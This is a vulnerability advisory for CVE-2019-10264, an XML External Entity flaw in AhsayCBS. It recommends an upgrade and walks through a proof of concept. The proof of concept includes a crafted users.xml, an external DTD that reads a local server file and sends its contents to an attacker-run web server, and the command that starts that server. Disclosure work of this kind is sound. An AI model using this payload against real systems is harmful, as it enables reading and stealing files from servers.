CVE-2019-10264 - XML External Entity (XXE)
Advisory
Upgrade to the latest version of Ahsay, currently 8.1.1.50 (https://www.ahsay.com/jsp/en/downloads/ahsay-downloads_latest-software_ahsaycbs.jsp)
Technical details
For this we need a couple of things.
A webserver to serve xxe.dtd We also need a webserver to receive the servers response. First we need to create a zip file containing users.xml, users.xml must contain the following:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.16.238.1/xxe.dtd">
<settings>&send;</settings>
Then we need to create the file xxe.dtd, that can contain the file we want to read. We then send the content to our listening server.
<!ENTITY % file SYSTEM "file:///C:\\Program Files\\AhsayCBS\\version.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://172.16.238.1/?%file;'>">
%all;
now we need to start a webserver I use Python for this on my system 172.16.238.1
Run the following command in the directory containing the .dtd file:
python -m SimpleHTTPServer 80
There will be a webserver listening on port 80. Now in the application go to the page to “Move / Import / Export Users” and choose the option import users to and select the zip file we created.
Screenshot: importing the zip file and saving it.
Screenshot: When the save button is hit, we immediately get a response to our webserver requesting the dtd file. This file gets executed and sends the content, 8.1.0.50
, to our server.